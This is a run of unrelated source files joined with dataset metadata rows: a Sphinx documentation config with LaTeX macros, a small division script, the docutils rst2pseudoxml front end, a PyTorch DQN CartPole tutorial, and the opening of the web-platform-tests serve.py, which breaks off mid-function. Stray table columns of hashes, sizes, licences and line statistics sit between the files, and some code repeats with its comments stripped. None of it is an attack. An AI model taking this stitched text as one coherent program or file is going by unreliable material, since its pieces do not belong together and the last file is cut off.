for part in info['fullname'].split('.'):
obj = getattr(obj, part)
import inspect
import os
fn = inspect.getsourcefile(obj)
fn = os.path.relpath(fn, start=os.path.abspath('..'))
source, lineno = inspect.getsourcelines(obj)
return fn, lineno, lineno + len(source) - 1
if domain != 'py' or not info['module']:
return None
try:
filename = '%s#L%d-L%d' % find_source()
except Exception:
filename = info['module'].replace('.', '/') + '.py'
#https://github.com/runawayhorse001/LearningApacheSpark/blob/master/pyspark/ml/clustering.py
return "https://github.com/runawayhorse001/LearningApacheSpark/blob/master/%s" % (filename)
# Options for LaTeX output
# ------------------------
latex_elements = {
# The paper size ('letter' or 'a4').
#latex_paper_size = 'a4',
# The font size ('10pt', '11pt' or '12pt').
'pointsize': '11pt',
# Additional stuff for the LaTeX preamble.
#latex_preamble = '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'pyspark.tex', 'Learning Apache Spark with Python',
'Wenqiang Feng', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = 'images/logo.jpg'
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = 'images/snake_theta2-trans.png'
#latex_logo = 'images/theano_logo_allblue_200x46.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
#latex_elements['preamble'] = '\usepackage{xcolor}'
# Additional stuff for the LaTeX preamble.
#latex_preamble
latex_elements['preamble'] = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\bU{\\mathbf{U}}\n'+\
'\\def\\bV{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
default_role = 'math'
pngmath_divpng_args = ['-gamma 1.5','-D 110']
#pngmath_divpng_args = ['-gamma', '1.5', '-D', '110', '-bg', 'Transparent']
imgmath_latex_preamble = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\U{\\mathbf{U}}\n'+\
'\\def\\V{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
| true
| true
|
1c445f905b74048639cccb3e88f2f31191f6f596
| 151
|
py
|
Python
|
print_quotient.py
|
gsandoval49/stp
|
b56e778101d29732adc4629e101cccf290dcb9e9
|
[
"Apache-2.0"
] | null | null | null |
print_quotient.py
|
gsandoval49/stp
|
b56e778101d29732adc4629e101cccf290dcb9e9
|
[
"Apache-2.0"
] | null | null | null |
print_quotient.py
|
gsandoval49/stp
|
b56e778101d29732adc4629e101cccf290dcb9e9
|
[
"Apache-2.0"
] | null | null | null |
# Create a program that takes two variables, divides them,
# and prints the quotient.
x = 42
y = 2
if x == 42:
if y == 2:
        print(x // y)
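# Added note: // is floor division, so this prints 21 for x = 42, y = 2;
# use x / y instead to get the true quotient as a float (21.0 here).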
| 15.1
| 58
| 0.576159
|
x = 42
y = 2
if x == 42:
if y == 2:
        print(x // y)
| true
| true
|
1c4460629d5ab0bb165c86640050ec517f98b099
| 645
|
py
|
Python
|
.venv/bin/rst2pseudoxml.py
|
WealtHawk-prod/WH_Utils
|
713b464a4a0971c8d5bc9bebc2e68f129ec65a4c
|
[
"Apache-2.0"
] | null | null | null |
.venv/bin/rst2pseudoxml.py
|
WealtHawk-prod/WH_Utils
|
713b464a4a0971c8d5bc9bebc2e68f129ec65a4c
|
[
"Apache-2.0"
] | null | null | null |
.venv/bin/rst2pseudoxml.py
|
WealtHawk-prod/WH_Utils
|
713b464a4a0971c8d5bc9bebc2e68f129ec65a4c
|
[
"Apache-2.0"
] | null | null | null |
#!/Users/mcclainthiel/Desktop/WH/WH_Utils2/.venv/bin/python3.9
# $Id: rst2pseudoxml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing pseudo-XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates pseudo-XML from standalone reStructuredText '
'sources (for testing purposes). ' + default_description)
publish_cmdline(description=description)
| 26.875
| 73
| 0.744186
|
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates pseudo-XML from standalone reStructuredText '
'sources (for testing purposes). ' + default_description)
publish_cmdline(description=description)
| true
| true
|
1c4460c9572f72b3583be0b06bb5fb540edd3e8f
| 6,720
|
py
|
Python
|
std/pytorch/02-mid/05.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
std/pytorch/02-mid/05.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
std/pytorch/02-mid/05.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
import gym
import math
import random
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from collections import namedtuple, deque
from itertools import count
from PIL import Image
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torchvision.transforms as T
env = gym.make("CartPole-v0").unwrapped
is_ipython = "inline" in matplotlib.get_backend()
if is_ipython:
from IPython import display
plt.ion()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
Transition = namedtuple("Transition", ("state", "action", "next_state", "reward"))
class ReplayMemory(object):
def __init__(self, capacity):
self.memory = deque([], maxlen=capacity)
def push(self, *args):
"""Save a transition"""
self.memory.append(Transition(*args))
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
class DQN(nn.Module):
def __init__(self, h, w, outputs):
super(DQN, self).__init__()
self.conv1 = nn.Conv2d(3, 16, kernel_size=5, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)
self.bn2 = nn.BatchNorm2d(32)
self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)
self.bn3 = nn.BatchNorm2d(32)
def conv2d_size_out(size, kernel_size=5, stride=2):
return (size - (kernel_size - 1) - 1) // stride + 1
convw = conv2d_size_out(conv2d_size_out(conv2d_size_out(w)))
convh = conv2d_size_out(conv2d_size_out(conv2d_size_out(h)))
linear_input_size = convw * convh * 32
self.head = nn.Linear(linear_input_size, outputs)
def forward(self, x):
x = x.to(device)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
return self.head(x.view(x.size(0), -1))
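# Worked example (added note, not in the original): with kernel_size=5 and
# stride=2, conv2d_size_out(size) = (size - 5) // 2 + 1, so a 40-pixel input
# dimension shrinks as 40 -> 18 -> 7 -> 2 across the three conv layers, and
# the flattened feature size fed to the linear head is convw * convh * 32.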
resize = T.Compose([T.ToPILImage(), T.Resize(40, interpolation=Image.CUBIC), T.ToTensor()])
def get_cart_location(screen_width):
world_width = env.x_threshold * 2
scale = screen_width / world_width
return int(env.state[0] * scale + screen_width / 2.0)
def get_screen():
screen = env.render(mode="rgb_array").transpose((2, 0, 1))
_, screen_height, screen_width = screen.shape
screen = screen[:, int(screen_height * 0.4) : int(screen_height * 0.8)]
view_width = int(screen_width * 0.6)
cart_location = get_cart_location(screen_width)
if cart_location < view_width // 2:
slice_range = slice(view_width)
elif cart_location > (screen_width - view_width // 2):
slice_range = slice(-view_width, None)
else:
slice_range = slice(cart_location - view_width // 2, cart_location + view_width // 2)
screen = screen[:, :, slice_range]
screen = np.ascontiguousarray(screen, dtype=np.float32) / 255
screen = torch.from_numpy(screen)
return resize(screen).unsqueeze(0)
env.reset()
plt.figure()
plt.imshow(get_screen().cpu().squeeze(0).permute(1, 2, 0).numpy(), interpolation="none")
plt.title("Example extracted screen")
plt.show()
BATCH_SIZE = 128
GAMMA = 0.999
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
TARGET_UPDATE = 10
init_screen = get_screen()
_, _, screen_height, screen_width = init_screen.shape
n_actions = env.action_space.n
policy_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net.load_state_dict(policy_net.state_dict())
target_net.eval()
optimizer = optim.RMSprop(policy_net.parameters())
memory = ReplayMemory(10000)
steps_done = 0
def select_action(state):
global steps_done
sample = random.random()
eps_threshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1.0 * steps_done / EPS_DECAY)
steps_done += 1
if sample > eps_threshold:
with torch.no_grad():
return policy_net(state).max(1)[1].view(1, 1)
else:
return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)
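# Worked numbers (added note, not in the original): eps_threshold decays
# exponentially from EPS_START toward EPS_END; at steps_done = 0 it is 0.9,
# after EPS_DECAY = 200 steps it is 0.05 + 0.85 * e**-1 ~= 0.36, and after
# 1000 steps it is ~= 0.056, so action selection becomes almost fully greedy.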
episode_durations = []
def plot_durations():
plt.figure(2)
plt.clf()
durations_t = torch.tensor(episode_durations, dtype=torch.float)
plt.title("Training...")
plt.xlabel("Episode")
plt.ylabel("Duration")
plt.plot(durations_t.numpy())
if len(durations_t) >= 100:
means = durations_t.unfold(0, 100, 1).mean(1).view(-1)
means = torch.cat((torch.zeros(99), means))
plt.plot(means.numpy())
plt.pause(0.001)
if is_ipython:
display.clear_output(wait=True)
display.display(plt.gcf())
def optimize_model():
if len(memory) < BATCH_SIZE:
return
transitions = memory.sample(BATCH_SIZE)
batch = Transition(*zip(*transitions))
non_final_mask = torch.tensor(
tuple(map(lambda s: s is not None, batch.next_state)), device=device, dtype=torch.bool
)
non_final_next_states = torch.cat([s for s in batch.next_state if s is not None])
state_batch = torch.cat(batch.state)
action_batch = torch.cat(batch.action)
reward_batch = torch.cat(batch.reward)
state_action_values = policy_net(state_batch).gather(1, action_batch)
next_state_values = torch.zeros(BATCH_SIZE, device=device)
next_state_values[non_final_mask] = target_net(non_final_next_states).max(1)[0].detach()
expected_state_action_values = (next_state_values * GAMMA) + reward_batch
criterion = nn.SmoothL1Loss()
loss = criterion(state_action_values, expected_state_action_values.unsqueeze(1))
optimizer.zero_grad()
loss.backward()
for param in policy_net.parameters():
param.grad.data.clamp_(-1, 1)
optimizer.step()
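# Added note (not in the original): the loss above regresses Q(s, a) from
# policy_net onto the one-step Bellman target r + GAMMA * max_a' Q_target(s', a'),
# with next_state_values pinned to 0 for terminal states via non_final_mask.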
num_episodes = 50
for i_episode in range(num_episodes):
env.reset()
last_screen = get_screen()
current_screen = get_screen()
state = current_screen - last_screen
for t in count():
action = select_action(state)
_, reward, done, _ = env.step(action.item())
reward = torch.tensor([reward], device=device)
last_screen = current_screen
current_screen = get_screen()
if not done:
next_state = current_screen - last_screen
else:
next_state = None
memory.push(state, action, next_state, reward)
state = next_state
optimize_model()
if done:
episode_durations.append(t + 1)
plot_durations()
break
if i_episode % TARGET_UPDATE == 0:
target_net.load_state_dict(policy_net.state_dict())
print("Complete")
env.render()
env.close()
plt.ioff()
plt.show()
| 29.217391
| 94
| 0.67381
|
import gym
import math
import random
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from collections import namedtuple, deque
from itertools import count
from PIL import Image
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torchvision.transforms as T
env = gym.make("CartPole-v0").unwrapped
is_ipython = "inline" in matplotlib.get_backend()
if is_ipython:
from IPython import display
plt.ion()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
Transition = namedtuple("Transition", ("state", "action", "next_state", "reward"))
class ReplayMemory(object):
def __init__(self, capacity):
self.memory = deque([], maxlen=capacity)
def push(self, *args):
self.memory.append(Transition(*args))
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
class DQN(nn.Module):
def __init__(self, h, w, outputs):
super(DQN, self).__init__()
self.conv1 = nn.Conv2d(3, 16, kernel_size=5, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=2)
self.bn2 = nn.BatchNorm2d(32)
self.conv3 = nn.Conv2d(32, 32, kernel_size=5, stride=2)
self.bn3 = nn.BatchNorm2d(32)
def conv2d_size_out(size, kernel_size=5, stride=2):
return (size - (kernel_size - 1) - 1) // stride + 1
convw = conv2d_size_out(conv2d_size_out(conv2d_size_out(w)))
convh = conv2d_size_out(conv2d_size_out(conv2d_size_out(h)))
linear_input_size = convw * convh * 32
self.head = nn.Linear(linear_input_size, outputs)
def forward(self, x):
x = x.to(device)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
return self.head(x.view(x.size(0), -1))
resize = T.Compose([T.ToPILImage(), T.Resize(40, interpolation=Image.CUBIC), T.ToTensor()])
def get_cart_location(screen_width):
world_width = env.x_threshold * 2
scale = screen_width / world_width
return int(env.state[0] * scale + screen_width / 2.0)
def get_screen():
screen = env.render(mode="rgb_array").transpose((2, 0, 1))
_, screen_height, screen_width = screen.shape
screen = screen[:, int(screen_height * 0.4) : int(screen_height * 0.8)]
view_width = int(screen_width * 0.6)
cart_location = get_cart_location(screen_width)
if cart_location < view_width // 2:
slice_range = slice(view_width)
elif cart_location > (screen_width - view_width // 2):
slice_range = slice(-view_width, None)
else:
slice_range = slice(cart_location - view_width // 2, cart_location + view_width // 2)
screen = screen[:, :, slice_range]
screen = np.ascontiguousarray(screen, dtype=np.float32) / 255
screen = torch.from_numpy(screen)
return resize(screen).unsqueeze(0)
env.reset()
plt.figure()
plt.imshow(get_screen().cpu().squeeze(0).permute(1, 2, 0).numpy(), interpolation="none")
plt.title("Example extracted screen")
plt.show()
BATCH_SIZE = 128
GAMMA = 0.999
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
TARGET_UPDATE = 10
init_screen = get_screen()
_, _, screen_height, screen_width = init_screen.shape
n_actions = env.action_space.n
policy_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net = DQN(screen_height, screen_width, n_actions).to(device)
target_net.load_state_dict(policy_net.state_dict())
target_net.eval()
optimizer = optim.RMSprop(policy_net.parameters())
memory = ReplayMemory(10000)
steps_done = 0
def select_action(state):
global steps_done
sample = random.random()
eps_threshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1.0 * steps_done / EPS_DECAY)
steps_done += 1
if sample > eps_threshold:
with torch.no_grad():
return policy_net(state).max(1)[1].view(1, 1)
else:
return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)
episode_durations = []
def plot_durations():
plt.figure(2)
plt.clf()
durations_t = torch.tensor(episode_durations, dtype=torch.float)
plt.title("Training...")
plt.xlabel("Episode")
plt.ylabel("Duration")
plt.plot(durations_t.numpy())
if len(durations_t) >= 100:
means = durations_t.unfold(0, 100, 1).mean(1).view(-1)
means = torch.cat((torch.zeros(99), means))
plt.plot(means.numpy())
plt.pause(0.001)
if is_ipython:
display.clear_output(wait=True)
display.display(plt.gcf())
def optimize_model():
if len(memory) < BATCH_SIZE:
return
transitions = memory.sample(BATCH_SIZE)
batch = Transition(*zip(*transitions))
non_final_mask = torch.tensor(
tuple(map(lambda s: s is not None, batch.next_state)), device=device, dtype=torch.bool
)
non_final_next_states = torch.cat([s for s in batch.next_state if s is not None])
state_batch = torch.cat(batch.state)
action_batch = torch.cat(batch.action)
reward_batch = torch.cat(batch.reward)
state_action_values = policy_net(state_batch).gather(1, action_batch)
next_state_values = torch.zeros(BATCH_SIZE, device=device)
next_state_values[non_final_mask] = target_net(non_final_next_states).max(1)[0].detach()
expected_state_action_values = (next_state_values * GAMMA) + reward_batch
criterion = nn.SmoothL1Loss()
loss = criterion(state_action_values, expected_state_action_values.unsqueeze(1))
optimizer.zero_grad()
loss.backward()
for param in policy_net.parameters():
param.grad.data.clamp_(-1, 1)
optimizer.step()
num_episodes = 50
for i_episode in range(num_episodes):
env.reset()
last_screen = get_screen()
current_screen = get_screen()
state = current_screen - last_screen
for t in count():
action = select_action(state)
_, reward, done, _ = env.step(action.item())
reward = torch.tensor([reward], device=device)
last_screen = current_screen
current_screen = get_screen()
if not done:
next_state = current_screen - last_screen
else:
next_state = None
memory.push(state, action, next_state, reward)
state = next_state
optimize_model()
if done:
episode_durations.append(t + 1)
plot_durations()
break
if i_episode % TARGET_UPDATE == 0:
target_net.load_state_dict(policy_net.state_dict())
print("Complete")
env.render()
env.close()
plt.ioff()
plt.show()
| true
| true
|
1c44615358567d6477f3746171bffef3935d9cc3
| 36,393
|
py
|
Python
|
tools/serve/serve.py
|
karlcow/wpt
|
e48be6d08b272744fe6d1d28e91a5808cf92fb68
|
[
"BSD-3-Clause"
] | null | null | null |
tools/serve/serve.py
|
karlcow/wpt
|
e48be6d08b272744fe6d1d28e91a5808cf92fb68
|
[
"BSD-3-Clause"
] | null | null | null |
tools/serve/serve.py
|
karlcow/wpt
|
e48be6d08b272744fe6d1d28e91a5808cf92fb68
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import logging
import os
import platform
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
from six.moves import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from multiprocessing import Process, Event
from localpaths import repo_root
from six.moves import reload_module
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts.\n"
"See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
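# Illustrative example (added note, not in the original): "www.example.com"
# and "example.com" share the trailing labels ["example", "com"], so they are
# not distinct; "example.com" and "example.org" differ in their last label,
# so they are distinct.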
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
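    # Illustrative example (added note, not in the original): with
    # WorkersHandler's 3-item tuple (".any.worker.html", ".any.js",
    # ".any.worker.js"), a request for /foo/bar.any.worker.html resolves to
    # /foo/bar.any.worker.js when resource_path is True (the resource the
    # wrapper loads) and to /foo/bar.any.js when False (the file on disk).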
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = u""
for (key, value) in self._get_metadata(request):
if key == "global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == "timeout":
if value == "long":
return '<meta name="timeout" content="long">'
if key == "title":
            value = value.replace("&", "&amp;").replace("<", "&lt;")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == "script":
            attribute = value.replace("&", "&amp;").replace('"', "&quot;")
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = "dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = "window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = "sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = "serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
if key == "title":
value = value.replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/results/", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
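    # Illustrative example (added note, not in the original): because "/" is
    # mounted first in __init__ and reversed() is used above, a later mount
    # such as "/extras/" is emitted before the catch-all "/" routes, so
    # requests under /extras/ match the more specific mount point.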
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
